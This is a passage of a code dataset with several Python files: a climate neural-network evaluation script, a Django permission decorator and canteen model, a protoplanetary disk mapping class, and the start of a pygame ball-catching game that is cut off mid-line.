PRECT_idx] + pred[:, PRECTEND_idx]\n\n # 4. Compute water mass residual\n# print('LHFLX',np.mean(LHFLX))\n# print('PREC',np.mean(PREC))\n# print('WATINT',np.mean(WATINT))\n WATRES = LHFLX - PREC - WATINT\n #print('WATRES',np.mean(WATRES))\n\n return np.square(WATRES)\n\ndef ent_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n SHFLX_idx = 302\n LHFLX_idx = 303\n\n # Output\n PHQ_idx = slice(0, 30)\n PHCLDLIQ_idx = slice(30, 60)\n PHCLDICE_idx = slice(60, 90)\n TPHYSTND_idx = slice(90, 120)\n DTVKE_idx = slice(180, 210)\n FSNT_idx = 210\n FSNS_idx = 211\n FLNT_idx = 212\n FLNS_idx = 213\n PRECT_idx = 214\n PRECTEND_idx = 215\n PRECST_idx = 216\n PRECSTEND_idx = 217\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute net energy input from phase change and precipitation\n PHAS = L_I / L_V * (\n (pred[:, PRECST_idx] + pred[:, PRECSTEND_idx]) -\n (pred[:, PRECT_idx] + pred[:, PRECTEND_idx])\n )\n\n # 3. Compute net energy input from radiation, SHFLX and TKE\n RAD = (pred[:, FSNT_idx] - pred[:, FSNS_idx] -\n pred[:, FLNT_idx] + pred[:, FLNS_idx])\n SHFLX = (inp[:, SHFLX_idx] * inp_div[SHFLX_idx] +\n inp_sub[SHFLX_idx])\n KEDINT = np.sum(dP_tilde * pred[:, DTVKE_idx], 1)\n\n # 4. Compute tendency of vapor due to phase change\n LHFLX = (inp[:, LHFLX_idx] * inp_div[LHFLX_idx] +\n inp_sub[LHFLX_idx])\n VAPINT = np.sum(dP_tilde * pred[:, PHQ_idx], 1)\n SPDQINT = (VAPINT - LHFLX) * L_S / L_V\n\n # 5. Same for cloud liquid water tendency\n SPDQCINT = np.sum(dP_tilde * pred[:, PHCLDLIQ_idx], 1) * L_I / L_V\n\n # 6. And the same for T but remember residual is still missing\n DTINT = np.sum(dP_tilde * pred[:, TPHYSTND_idx], 1)\n\n # 7. Compute enthalpy residual\n ENTRES = SPDQINT + SPDQCINT + DTINT - RAD - SHFLX - PHAS - KEDINT\n\n return np.square(ENTRES)\n\ndef lw_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n\n # Output\n QRL_idx = slice(120, 150)\n FLNS_idx = 213\n FLNT_idx = 212\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute longwave integral\n LWINT = np.sum(dP_tilde *pred[:, QRL_idx], axis=1)\n\n # 3. Compute net longwave flux from lw fluxes at top and bottom\n LWNET = pred[:, FLNS_idx] - pred[:, FLNT_idx]\n\n # 4. Compute water mass residual\n LWRES = LWINT-LWNET\n\n return np.square(LWRES)\n\ndef sw_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n\n # Input\n PS_idx = 300\n\n # Output\n QRS_idx = slice(150, 180)\n FSNS_idx = 211\n FSNT_idx = 210\n\n # 1. 
Compute dP_tilde\n dP_tilde = compute_dP_tilde(inp[:, PS_idx], inp_div[PS_idx], inp_sub[PS_idx], norm_q, hyai, hybi)\n\n # 2. Compute longwave integral\n SWINT = np.sum(dP_tilde *pred[:, QRS_idx], axis=1)\n\n # 3. Compute net longwave flux from lw fluxes at top and bottom\n SWNET = pred[:, FSNT_idx] - pred[:, FSNS_idx]\n\n # 4. Compute water mass residual\n SWRES = SWINT-SWNET\n\n return np.square(SWRES)\n\ndef tot_res_diagno(inp_div,inp_sub,norm_q,inp,pred):\n return 0.25*(mass_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n ent_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n lw_res_diagno(inp_div,inp_sub,norm_q,inp,pred)+\\\n sw_res_diagno(inp_div,inp_sub,norm_q,inp,pred))\n\nmult_array = np.array([1,2,5,10,20])\nend_array = ['_2','_2','','','']\ndict_lay = {'SurRadLayer':SurRadLayer,'MassConsLayer':MassConsLayer,'EntConsLayer':EntConsLayer,\n 'MassConsLayer_choice':MassConsLayer_choice,'EntConsLayer_choice':EntConsLayer_choice,\n 'Conserving_Model':Conserving_Model,'weighted_loss':Weighted_Loss(lev1=14,lev2=104,multiplier=multiplier)}\n\nNN = {}; md = {};\nos.chdir(TRAINDIR+'/HDF5_DATA')\nfor im,multiplier in enumerate(mult_array):\n print('Multiplier is ',multiplier)\n path = TRAINDIR+'HDF5_DATA/Cm14_e14_multiplier'+str(multiplier)+end_array[im]+'.hdf5'\n NN[multiplier] = load_model(path,custom_objects=dict_lay)\n \ngen = valid_gen\n\nSE = {}\nTRES = {}\nMSE = {}\n\nspl = 0\nwhile gen[spl][0].size>0: #spl is sample number\n \n print('spl=',spl,' ',end='\\r')\n \n inp = gen[spl][0]\n truth = gen[spl][1]\n \n for im,multiplier in enumerate(mult_array):\n pred = NN[multiplier].predict_on_batch(inp)\n #pred[:,14] /= multiplier\n #pred[:,104] /= multiplier\n\n se = (pred-truth)**2\n\n pred_phys = pred/gen.output_transform.scale\n\n tresid = tot_res_diagno(gen.input_transform.div,gen.input_transform.sub,\n gen.output_transform.scale[:30],inp,pred)\n\n if spl==0: SE[multiplier] = se; TRES[multiplier] = tresid; MSE[multiplier] = np.mean(se,axis=1);\n else: \n SE[multiplier] += se; \n TRES[multiplier] = np.concatenate((TRES[multiplier],tresid),axis=0); \n MSE[multiplier] = np.concatenate((MSE[multiplier],np.mean(se,axis=1)),axis=0);\n\n spl += 1\n \nfor imultiplier,multiplier in enumerate(mult_array): SE[multiplier] /= spl\n \npathPKL = '/home/t/Tom.Beucler/SPCAM/CBRAIN-CAM/notebooks/tbeucler_devlog/PKL_DATA/'\n\nhf = open(pathPKL+'2020_03_04_validgen036.pkl','wb')\nS = {\"TRES\":TRES,\"MSE\":MSE,\"SE\":SE}\npickle.dump(S,hf)\nhf.close()","sub_path":"notebooks/tbeucler_devlog/036_Eval_valid.py","file_name":"036_Eval_valid.py","file_ext":"py","file_size_in_byte":17755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"137789176","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect\n\ndecorator_with_arguments = lambda decorator: lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)\n\n\ndef has_uploader_permission(func):\n def _function(request, *args, **kwargs):\n uploader_permissions = [\n 'uploader.uploader_access',\n 'uploader.uploader_admin',\n 'uploader.uploader_surf',\n 'uploader.uploader_bhop',\n ]\n for perm in uploader_permissions:\n if request.user.has_perm(perm):\n return func(request, *args, **kwargs)\n\n # we did not find a valid permission\n return redirect('uploader:disabled')\n return 
_function","sub_path":"home/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"140469573","text":"from urllib.parse import quote\nfrom django.db import models\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import ValidationError\nfrom data.department_choices import Department\nfrom data.utils import optimize_image\nfrom .sector import Sector\nfrom .softdeletionmodel import SoftDeletionModel\n\n\ndef validate_siret(siret):\n \"\"\"\n Performs length and Luhn validation\n (https://portal.hardis-group.com/pages/viewpage.action?pageId=120357227)\n \"\"\"\n if siret is None or siret == \"\":\n return\n if len(siret) != 14:\n raise ValidationError(\"14 caractères numériques sont attendus\")\n odd_digits = [int(n) for n in siret[-1::-2]]\n even_digits = [int(n) for n in siret[-2::-2]]\n checksum = sum(odd_digits)\n for digit in even_digits:\n checksum += sum(int(n) for n in str(digit * 2))\n luhn_checksum_valid = checksum % 10 == 0\n\n if not luhn_checksum_valid:\n raise ValidationError(\"Le numéro SIRET n'est pas valide.\")\n\n\nclass Canteen(SoftDeletionModel):\n class Meta:\n verbose_name = \"cantine\"\n verbose_name_plural = \"cantines\"\n ordering = [\"-creation_date\"]\n\n class ManagementType(models.TextChoices):\n DIRECT = \"direct\", \"Directe\"\n CONCEDED = \"conceded\", \"Concédée\"\n\n class ProductionType(models.TextChoices):\n CENTRAL = \"central\", \"Cuisine centrale\"\n ON_SITE = \"site\", \"Cuisine-site\"\n\n class PublicationStatus(models.TextChoices):\n DRAFT = \"draft\", \"🔒 Non publié\"\n PENDING = \"pending\", \"❓ En attente de vérification\"\n PUBLISHED = \"published\", \"✅ Publié\"\n\n creation_date = models.DateTimeField(auto_now_add=True)\n modification_date = models.DateTimeField(auto_now=True)\n\n name = models.TextField(verbose_name=\"nom\")\n\n city = models.TextField(null=True, blank=True, verbose_name=\"ville\")\n city_insee_code = models.TextField(null=True, blank=True, verbose_name=\"Code INSEE\")\n\n department = models.TextField(\n null=True, blank=True, choices=Department.choices, verbose_name=\"département\"\n )\n postal_code = models.CharField(\n max_length=20, null=True, blank=True, verbose_name=\"code postal\"\n )\n sectors = models.ManyToManyField(\n Sector, blank=True, verbose_name=\"secteurs d'activité\"\n )\n managers = models.ManyToManyField(\n get_user_model(),\n blank=True,\n related_name=\"canteens\",\n verbose_name=\"gestionnaires\",\n )\n\n daily_meal_count = models.IntegerField(\n null=True, blank=True, verbose_name=\"repas par jour\"\n )\n # TODO: once have a standardised format (see _normalise_siret), index by siret if given\n siret = models.TextField(null=True, blank=True, validators=[validate_siret])\n central_producer_siret = models.TextField(\n null=True,\n blank=True,\n verbose_name=\"siret de la cuisine centrale\",\n validators=[validate_siret],\n )\n management_type = models.CharField(\n max_length=255,\n choices=ManagementType.choices,\n null=True,\n blank=True,\n verbose_name=\"mode de gestion\",\n )\n production_type = models.CharField(\n max_length=255,\n choices=ProductionType.choices,\n null=True,\n blank=True,\n verbose_name=\"mode de production\",\n )\n\n main_image = models.ImageField(\n null=True, blank=True, verbose_name=\"Image principale\"\n )\n\n # Publication things\n publication_status = models.CharField(\n max_length=50,\n 
choices=PublicationStatus.choices,\n default=\"draft\",\n verbose_name=\"état de publication\",\n )\n publication_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de publication\",\n )\n quality_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure appro\",\n )\n waste_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure gaspillage\",\n )\n diversification_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure diversification\",\n )\n plastics_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure plastiques\",\n )\n information_comments = models.TextField(\n max_length=255,\n null=True,\n blank=True,\n verbose_name=\"commentaires de mesure information\",\n )\n\n def save(\n self, force_insert=False, force_update=False, using=None, update_fields=None\n ):\n max_image_size = 1024\n if self.main_image:\n self.main_image = optimize_image(\n self.main_image, self.main_image.name, max_image_size\n )\n super(Canteen, self).save(force_insert, force_update, using, update_fields)\n\n @property\n def url_path(self):\n slug = f\"{quote(self.name)}--{self.id}\"\n return f\"/nos-cantines/{slug}\"\n\n def __str__(self):\n return f'Cantine \"{self.name}\"'\n\n def update_publication_comments(self, data):\n self.publication_comments = data.get(\"publication_comments\")\n self.quality_comments = data.get(\"quality_comments\")\n self.waste_comments = data.get(\"waste_comments\")\n self.diversification_comments = data.get(\"diversification_comments\")\n self.plastics_comments = data.get(\"plastics_comments\")\n self.information_comments = data.get(\"information_comments\")\n","sub_path":"data/models/canteen.py","file_name":"canteen.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"64983263","text":"\"\"\"\nModule with mapping functionalities for protoplanetary disks.\n\"\"\"\n\nimport math\nimport warnings\n\nfrom typing import List, Optional, Tuple\n\nimport numpy as np\n\nfrom astropy.io import fits\nfrom scipy.interpolate import griddata, interp1d\nfrom typeguard import typechecked\n\n\nclass DiskMap:\n \"\"\"\n Class for mapping a surface layer of a protoplanetary disk.\n \"\"\"\n\n @typechecked\n def __init__(self,\n fitsfile: str,\n pixscale: float,\n inclination: float,\n pos_angle: float,\n distance: float,\n image_type: str = 'polarized') -> None:\n \"\"\"\n Parameters\n ----------\n fitsfile : str\n FITS file with the scattered light image.\n pixscale : float\n Pixel scale (arcsec per pixel).\n inclination : float\n Inclination of the disk (deg). Include a minus sign to exchange the near and far side\n with the mapping of the disk.\n pos_angle : float\n Position angle of the disk (deg). Defined in counterclockwise direction with respect\n to the vertical axis (i.e. east of north).\n distance : float\n Distance (pc).\n image_type : str\n Image type ('polarized' or 'total'). This parameter affects the output that will be\n stored. 
For example, the conversion from polarized to total intensity phase function\n is only done with `image_type='polarized'`.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n self.image = fits.getdata(fitsfile)\n self.image = np.nan_to_num(self.image)\n\n if self.image.ndim == 3:\n warn.warnings('The FITS file contains a 3D data cube so using the first image.')\n\n self.image = self.image[0, ]\n\n elif self.image.ndim != 2:\n raise ValueError('DiskMap requires a 2D image.')\n\n if self.image.shape[0] != self.image.shape[1]:\n raise ValueError('The dimensions of the image should have the same size.')\n\n if image_type not in ['polarized', 'total']:\n raise ValueError('The argument of \\'image_type\\' should be set to \\'polarized\\' '\n 'or \\'total\\'.')\n\n self.pixscale = pixscale # (arcsec)\n self.incl = math.radians(inclination) # (rad)\n self.pos_ang = math.radians(pos_angle) # (rad)\n self.distance = distance # (pc)\n self.image_type = image_type\n\n self.grid = 501 # should be odd\n\n self.radius = None\n self.azimuth = None\n self.opening = None\n self.scatter = None\n self.im_deproj = None\n self.im_scaled = None\n self.stokes_i = None\n self.phase = None\n\n # sum_before = np.sum(self.image)\n\n # im_scale = rescale(image=np.asarray(self.image, dtype=np.float64),\n # scale=(10., 10.),\n # order=5,\n # mode='reflect',\n # anti_aliasing=True,\n # multichannel=False)\n\n # sum_after = np.sum(im_scale)\n\n # self.image = im_scale * (sum_before / sum_after)\n # self.pixscale /= 10.\n\n self.npix = self.image.shape[0]\n\n @typechecked\n def map_disk(self,\n power_law: Tuple[float, float, float],\n radius: Tuple[float, float, int] = (1., 500., 100),\n surface: str = 'power-law',\n filename: Optional[str] = None) -> None:\n \"\"\"\n Function for mapping a scattered light image to a power-law disk surface.\n\n Parameters\n ----------\n power_law : tuple(float, float, float)\n The argument for the power-law function, provided as (a, b, c) with\n f(x) = a + b*x^c, with ``a`` and ``b`` in au. Set all values to zero for the mapping\n and deprojection of a geometrically flat disk, in which case only the inclination is\n used for the deprojection.\n radius : tuple(float, float, int)\n Radius points that are sampled, provided as (r_in, r_out, n_r), with ``r_in`` and\n ``r_out`` in au. The outer radius should be set large enough such that a radius is\n sampled for each pixel in the field of view. 
To check if any NaNs are present, have\n a look at the `_radius.fits` output.\n surface : str\n Parameterization type for the disk surface ('power-law' or 'file').\n filename : star, None\n Filename which contains the radius in au (first column) and the height of the disk\n surface in au (second column).\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if surface == 'power-law':\n\n # Power-law disk height\n\n @typechecked\n def power_law_height(x_power: np.ndarray,\n a_power: float,\n b_power: float,\n c_power: float) -> np.ndarray:\n\n return a_power + b_power*x_power**c_power\n\n # midplane radius (au)\n disk_radius = np.linspace(radius[0], radius[1], radius[2])\n\n # disk height (au)\n disk_height = power_law_height(disk_radius, power_law[0], power_law[1], power_law[2])\n\n # opening angle (rad)\n disk_opening = np.arctan2(disk_height, disk_radius)\n\n elif surface == 'file':\n\n # Read disk height from ASCII file\n\n data = np.loadtxt(filename)\n\n # midplane radius (au)\n disk_radius = np.linspace(radius[0], radius[1], radius[2])\n\n # disk height (au)\n height_interp = interp1d(data[:, 0], data[:, 1])\n disk_height = height_interp(disk_radius)\n\n # opening angle (rad)\n disk_opening = np.arctan2(disk_height, disk_radius) # (au)\n\n # Project disk height to image plane\n\n disk_phi = np.linspace(0., 359., 360) # (deg)\n disk_phi = np.radians(disk_phi) # (rad)\n\n x_im = []\n y_im = []\n r_im = []\n o_im = []\n s_im = []\n p_im = []\n\n for i, r_item in enumerate(disk_radius):\n for j, p_item in enumerate(disk_phi):\n\n x_tmp = r_item * np.sin(p_item)\n\n y_tmp = disk_height[i]*math.sin(self.incl) - \\\n r_item*np.cos(p_item)*math.cos(self.incl)\n\n x_rot = x_tmp*math.cos(math.pi-self.pos_ang) - \\\n y_tmp*math.sin(math.pi-self.pos_ang)\n\n y_rot = x_tmp*math.sin(math.pi-self.pos_ang) + \\\n y_tmp*math.cos(math.pi-self.pos_ang)\n\n x_im.append(x_rot)\n y_im.append(y_rot)\n\n r_im.append(math.sqrt(r_item**2+disk_height[i]**2))\n p_im.append(p_item)\n o_im.append(disk_opening[i])\n\n ang_tmp = math.pi/2.+disk_opening[i]\n\n par1 = math.sin(ang_tmp)*math.cos(math.pi+p_item)*math.sin(self.incl)\n par2 = math.cos(ang_tmp)*math.cos(self.incl)\n\n s_im.append(math.pi - math.acos(par1+par2))\n\n # Sort image plane points along x-axis\n\n x_index = np.argsort(x_im)\n\n y_sort = np.zeros(len(y_im))\n r_sort = np.zeros(len(y_im))\n p_sort = np.zeros(len(y_im))\n o_sort = np.zeros(len(y_im))\n s_sort = np.zeros(len(y_im))\n\n for i in range(len(y_im)):\n y_sort[i] = y_im[x_index[i]]\n r_sort[i] = r_im[x_index[i]]\n p_sort[i] = p_im[x_index[i]]\n o_sort[i] = o_im[x_index[i]]\n s_sort[i] = s_im[x_index[i]]\n\n grid_xy = np.zeros((self.grid**2, 2))\n\n count = 0\n\n for i in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n for j in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n grid_xy[count, 0] = float(i)\n grid_xy[count, 1] = float(j)\n\n count += 1\n\n image_xy = np.zeros((len(x_im), 2))\n\n for i, _ in enumerate(x_im):\n image_xy[i, 0] = x_im[i]\n image_xy[i, 1] = y_im[i]\n\n # Interpolate image plane\n\n if self.npix % 2 == 0:\n x_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n y_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n\n elif self.npix % 2 == 1:\n x_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n y_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n\n x_grid *= self.pixscale*self.distance # (au)\n y_grid *= self.pixscale*self.distance # (au)\n\n grid = np.zeros((self.npix**2, 2))\n\n count = 0\n\n for i in 
range(self.npix):\n for j in range(self.npix):\n grid[count, 0] = x_grid[i]\n grid[count, 1] = x_grid[j]\n\n count += 1\n\n fit_radius = griddata(image_xy, r_im, grid, method='linear')\n fit_azimuth = griddata(image_xy, p_im, grid, method='linear')\n fit_opening = griddata(image_xy, o_im, grid, method='linear')\n fit_scatter = griddata(image_xy, s_im, grid, method='linear')\n\n self.radius = np.zeros((self.npix, self.npix))\n self.azimuth = np.zeros((self.npix, self.npix))\n self.opening = np.zeros((self.npix, self.npix))\n self.scatter = np.zeros((self.npix, self.npix))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n self.radius[i, j] = fit_radius[count]\n self.azimuth[i, j] = fit_azimuth[count]\n self.opening[i, j] = fit_opening[count]\n self.scatter[i, j] = fit_scatter[count]\n\n count += 1\n\n @typechecked\n def sort_disk(self) -> Tuple[List[np.float64], np.ndarray]:\n \"\"\"\n Function for creating a list with pixel values and creating a 2D array with the x and y\n pixel coordinates.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n # Create lists with x and y coordinates and pixel values\n\n x_disk = []\n y_disk = []\n im_disk = []\n\n for i in range(self.npix):\n for j in range(self.npix):\n x_tmp = self.radius[i, j]*np.cos(self.azimuth[i, j])\n y_tmp = self.radius[i, j]*np.sin(self.azimuth[i, j])\n\n x_disk.append(x_tmp*math.cos(math.pi/2.-self.pos_ang) -\n y_tmp*math.sin(math.pi/2.-self.pos_ang))\n\n y_disk.append(x_tmp*math.sin(math.pi/2.-self.pos_ang) +\n y_tmp*math.cos(math.pi/2.-self.pos_ang))\n\n im_disk.append(self.image[i, j])\n\n # Sort disk plane points along x-axis\n\n x_index = np.argsort(x_disk)\n\n y_sort = np.zeros(len(y_disk))\n im_sort = np.zeros(len(y_disk))\n\n for i in range(len(y_disk)):\n y_sort[i] = y_disk[x_index[i]]\n im_sort[i] = im_disk[x_index[i]]\n\n # count = 0\n #\n # grid_xy = np.zeros((self.grid**2, 2))\n #\n # for i in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n # for j in range(-(self.grid-1)//2, (self.grid-1)//2+1):\n # grid_xy[count, 0] = float(i)\n # grid_xy[count, 1] = float(j)\n #\n # count += 1\n\n image_xy = np.zeros((len(y_disk), 2))\n\n for i, _ in enumerate(y_disk):\n image_xy[i, 0] = x_disk[i]\n image_xy[i, 1] = y_disk[i]\n\n return im_disk, image_xy\n\n @typechecked\n def deproject_disk(self) -> None:\n \"\"\"\n Function for deprojecting a disk surface based on the mapping of\n :meth:`~diskmap.diskmap.DiskMap.map_disk`.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is None or self.azimuth is None:\n raise ValueError('The disk has not been mapped yet with the \\'map_disk\\' method.')\n\n im_disk, image_xy = self.sort_disk()\n\n # Interpolate disk plane\n\n if self.npix % 2 == 0:\n x_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n y_grid = np.linspace(-self.npix/2+0.5, self.npix/2-0.5, self.npix)\n\n elif self.npix % 2 == 1:\n x_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n y_grid = np.linspace(-(self.npix-1)/2, (self.npix-1)/2, self.npix)\n\n x_grid *= self.pixscale*self.distance # (au)\n y_grid *= self.pixscale*self.distance # (au)\n\n grid = np.zeros((self.npix**2, 2))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n grid[count, 0] = x_grid[i]\n grid[count, 1] = x_grid[j]\n\n count += 1\n\n try:\n fit_im = griddata(image_xy, im_disk, grid, method='linear')\n\n except ValueError:\n raise ValueError('The radius sampling should cover the complete field of view of the '\n 'image. 
Try increasing the outer \\'radius\\' value in \\'map_disk\\' '\n 'and have a look at the \\'_radius.fits\\' output to check for NaNs.')\n\n self.im_deproj = np.zeros((self.npix, self.npix))\n\n count = 0\n\n for i in range(self.npix):\n for j in range(self.npix):\n self.im_deproj[i, j] = fit_im[count]\n\n count += 1\n\n @typechecked\n def r2_scaling(self,\n r_max: float) -> None:\n \"\"\"\n Function for correcting a scattered light image for the r^2 decrease of the stellar\n irradiation of the disk surface.\n\n Parameters\n ----------\n r_max : float\n Maximum disk radius (au) for the r^2-scaling. Beyond this distance, a constant\n r^2-scaling is applied of value ``r_max``.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is None:\n raise ValueError('Please run \\'map_disk\\' before using \\'r2_scaling\\'.')\n\n self.im_scaled = np.zeros((self.npix, self.npix))\n\n for i in range(self.npix):\n for j in range(self.npix):\n if self.radius[i, j] < r_max:\n self.im_scaled[i, j] = self.radius[i, j]**2 * self.image[i, j]\n\n else:\n self.im_scaled[i, j] = r_max**2 * self.image[i, j]\n\n @typechecked\n def total_intensity(self,\n pol_max: 1.) -> None:\n \"\"\"\n Function for estimating the (stellar irradiation corrected) total intensity image when\n ``fitsfile`` contains a polarized light image and ``image_type='polarized'``. A bell-shaped\n degree of polarized is assumed and effects of multiple scattering are ignored.\n\n Parameters\n ----------\n pol_max : float\n The peak of the bell-shaped degree of polarization, which effectively normalizes the\n estimated total intensity image.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.image_type != 'polarized':\n raise ValueError('The \\'total_intensity\\' method should only be used if the input '\n 'image is a polarized light image (i.e. image_type=\\'polarized\\').')\n\n if self.scatter is None or self.im_scaled is None:\n raise ValueError('Please run \\'map_disk\\' before using \\'total_intensity\\'.')\n\n alpha = np.cos(self.scatter)\n deg_pol = -pol_max * (alpha**2 - 1.) / (alpha**2 + 1.)\n\n self.stokes_i = self.im_scaled / deg_pol\n\n @typechecked\n def phase_function(self,\n radius: Tuple[float, float],\n n_phase: int):\n \"\"\"\n Function for extracting the phase function. If ``image_type='polarized'``, the polarized\n phase function is extracted and the total intensity phase function is estimated by assuming\n a bell-shaped degree of polarization. If ``image_type='polarized'``, the total intensity\n phase function is extracted. The extracting is done on the r$^2$-scaled pixel values\n such that the phase function is not biased by irradiation effects. 
The phase functions are\n have been normalized by their maximum value.\n\n Parameters\n ----------\n radius : tuple(float, float)\n Inner and outer radius (au) between which pixels are selected for estimating the phase\n function.\n n_phase : int\n Number of sampling points for the phase function between 0 and 180 deg.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n # Phase function is normalizedf so pol_max has not effect\n pol_max = 1.\n\n if self.radius is None or self.scatter is None or self.im_scaled is None:\n raise ValueError('Please run \\'map_disk\\' and \\'r2_scaling\\' before using '\n '\\'phase_function\\'.')\n\n scat_select = []\n im_select = []\n\n for i in range(self.npix):\n for j in range(self.npix):\n if self.radius[i, j] > radius[0] and self.radius[i, j] < radius[1]:\n scat_select.append(math.degrees(self.scatter[i, j]))\n\n # use im_scaled to correct for differences across the selected radius\n im_select.append(self.im_scaled[i, j])\n\n phase_bins = np.linspace(0., 180., num=n_phase)\n bin_index = np.digitize(scat_select, phase_bins)\n\n im_bins = []\n scat_bins = []\n\n for i in range(n_phase):\n im_bins.append([])\n scat_bins.append([])\n\n for i, _ in enumerate(im_select):\n im_bins[bin_index[i]-1].append(im_select[i])\n scat_bins[bin_index[i]-1].append(scat_select[i])\n\n angle = []\n pol_flux = []\n pol_error = []\n\n for i in range(n_phase):\n if len(im_bins[i]) > 0:\n angle.append(np.nanmean(scat_bins[i]))\n pol_flux.append(np.nanmean(im_bins[i]))\n pol_error.append(np.nanstd(im_bins[i])/math.sqrt(len(im_bins[i])))\n\n if self.image_type == 'polarized':\n # Degree of polarization\n\n alpha = np.cos(np.array(angle)*np.pi/180.)\n deg_pol = -pol_max*(alpha*alpha-1.)/(alpha*alpha+1.)\n\n tot_flux = pol_flux/deg_pol\n tot_error = pol_error/deg_pol\n\n # Normalization\n\n flux_norm = max(pol_flux)\n pol_flux = np.array(pol_flux)/flux_norm\n pol_error = np.array(pol_error)/flux_norm\n\n flux_norm = max(tot_flux)\n tot_flux = np.array(tot_flux)/flux_norm\n tot_error = np.array(tot_error)/flux_norm\n\n self.phase = np.column_stack([angle, pol_flux, pol_error, tot_flux, tot_error])\n\n else:\n self.phase = np.column_stack([angle, pol_flux, pol_error])\n\n @typechecked\n def write_output(self,\n filename: str) -> None:\n \"\"\"\n Function for writing the available results to FITS files.\n\n Parameters\n ----------\n filename : str\n Filename start that is used for all the output file.\n\n Returns\n -------\n NoneType\n None\n \"\"\"\n\n if self.radius is not None:\n fits.writeto(f'{filename}_radius.fits', self.radius, overwrite=True)\n\n if self.scatter is not None:\n fits.writeto(f'{filename}_scat_angle.fits', np.degrees(self.scatter), overwrite=True)\n\n if self.im_deproj is not None:\n fits.writeto(f'{filename}_deprojected.fits', self.im_deproj, overwrite=True)\n\n if self.im_scaled is not None:\n fits.writeto(f'{filename}_r2_scaled.fits', self.im_scaled, overwrite=True)\n\n if self.stokes_i is not None:\n fits.writeto(f'{filename}_total_intensity.fits', self.stokes_i, overwrite=True)\n\n if self.phase is not None:\n if self.image_type == 'polarized':\n header = 'Scattering angle (deg) - Normalized polarized flux - Error ' \\\n '- Normalized total flux - Error'\n\n else:\n header = 'Scattering angle (deg) - Normalized total flux - Error'\n\n np.savetxt(f'{filename}_phase_function.dat', self.phase, 
header=header)\n","sub_path":"diskmap/diskmap.py","file_name":"diskmap.py","file_ext":"py","file_size_in_byte":20545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"107946855","text":"import pygame\nimport random\n\n# Color\nBlack = (0, 0, 0)\nBallColor = (255, 255, 255)\nPlayerColor = (160, 82, 45)\n\npygame.init()\nscreen = pygame.display.set_mode((640, 480))\nmyclock = pygame.time.Clock()\n\nflag = 0\nGameStart = 0\ncount = 5\nPlayer_X = 280\nBall_X = random.randrange(15,625)\nBall_Y = 10\nBallRadius = 10\nSpeedVector_X = random.randint(0, 10) - 5\nSpeedVector_Y = random.randint(3, 5)\n\nwhile flag == 0:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n flag = 1\n #GameStart描画\n while GameStart == 0:\n screen.fill(Black)\n font = pygame.font.SysFont(None, 80)\n Title_text = font.render(\"Getting Ball\", True, BallColor)\n screen.blit(Title_text, (160, 100))\n font = pygame.font.SysFont(None, 40)\n Start_text = font.render(\"Please wait \" + str(count) + \"seconds\", True, PlayerColor)\n screen.blit(Start_text, (200, 300))\n pygame.display.flip()\n pygame.time.delay(1000)\n count -= 1\n if count == 0: GameStart = 1\n\n press = pygame.key.get_pressed()\n if press[pygame.K_LEFT] and Player_X > 0: Player_X -= 5\n if press[pygame.K_RIGHT] and Player_X < 560: Player_X += 5\n screen.fill(Black)\n # Player描画\n Player = pygame.Rect(Player_X, 440, 80, 10)\n pygame.draw.rect(screen, PlayerColor, Player)\n # Ball描画\n Ball_X += SpeedVector_X\n Ball_Y += SpeedVector_Y\n pygame.draw.circle(screen, BallColor, (Ball_X, Ball_Y), BallRadius)\n #Ball反射&当たり判定\n if Ball_X < 10 or Ball_X > 630:SpeedVector_X *= -1 # X反射\n if Ball_Y > 500: # GameOver\n screen.fill(Black)\n font = 